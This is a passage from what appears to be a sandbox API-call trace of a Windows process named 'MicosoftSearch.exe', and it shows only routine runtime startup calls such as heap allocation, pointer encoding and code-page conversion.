(lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.043] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.043] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.043] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.043] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.043] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.043] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.043] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.044] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.044] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.044] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.044] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.044] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.044] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0238.044] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x214) returned 0x2407d0 [0238.044] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.045] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0238.045] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.045] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.045] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0238.045] GetCurrentThreadId () returned 0x548 [0238.045] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\MicosoftSearch.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0238.045] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x800) returned 0x2409f0 [0238.045] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0238.045] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0238.045] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0238.045] SetHandleCount (uNumber=0x20) returned 0x20 [0238.045] GetCommandLineW () returned="\"C:\\Windows\\System32\\MicosoftSearch.exe\" " [0238.045] GetEnvironmentStringsW () returned 0xac1c38* [0238.045] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xb02) returned 0x2411f8 [0238.045] FreeEnvironmentStringsW (penv=0xac1c38) returned 1 [0238.046] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x927d08, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\MicosoftSearch.exe" (normalized: "c:\\windows\\system32\\micosoftsearch.exe")) returned 0x26 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x56) returned 0x241d08 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x9c) returned 0x241d68 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3e) returned 0x241e10 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6c) returned 0x241e58 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6e) returned 0x241ed0 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x78) returned 0x241f48 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x62) returned 0x241fc8 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x242038 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x242070 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x28) returned 0x2420c0 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1a) returned 0x2420f0 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4a) returned 0x242118 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x72) returned 0x242170 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x2421f0 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x242228 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1c) returned 0x242260 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xd2) returned 0x242288 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x7c) returned 0x242368 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x2423f0 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3a) returned 0x242430 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x90) returned 0x242478 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x242510 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x242540 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x242578 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x2425b8 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x52) returned 0x242608 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x242668 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x82) returned 0x2426b0 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x242740 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x28) returned 0x242778 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x2427a8 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2c) returned 0x2427d0 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x242808 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x52) returned 0x242868 [0238.046] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2a) returned 0x2428c8 [0238.047] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x242900 [0238.047] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x242948 [0238.047] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x2429a8 [0238.047] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x2429d8 [0238.047] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8c) returned 0x242a10 [0238.047] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2411f8 | out: hHeap=0x240000) returned 1 [0238.106] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x80) returned 0x242aa8 [0238.107] GetLastError () returned 0x0 [0238.107] SetLastError (dwErrCode=0x0) [0238.107] GetLastError () returned 0x0 [0238.107] SetLastError (dwErrCode=0x0) [0238.107] GetLastError () returned 0x0 [0238.107] SetLastError (dwErrCode=0x0) [0238.107] GetACP () returned 0x4e4 [0238.107] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x220) returned 0x242b30 [0238.107] GetLastError () returned 0x0 [0238.107] SetLastError (dwErrCode=0x0) [0238.107] IsValidCodePage (CodePage=0x4e4) returned 1 [0238.107] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0238.107] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0238.107] GetLastError () returned 0x0 [0238.107] SetLastError (dwErrCode=0x0) [0238.107] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0238.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0238.107] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0238.107] GetLastError () returned 0x0 [0238.107] SetLastError (dwErrCode=0x0) [0238.107] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0238.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ寈⧣倍BĀ") returned 256 [0238.107] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ寈⧣倍BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0238.107] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ寈⧣倍BĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0238.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x0b\x04\xd9\x24\x9c\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0238.108] GetLastError () returned 0x0 [0238.108] SetLastError (dwErrCode=0x0) [0238.108] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.108] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ寈⧣倍BĀ") returned 256 [0238.108] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ寈⧣倍BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0238.108] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ寈⧣倍BĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0238.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d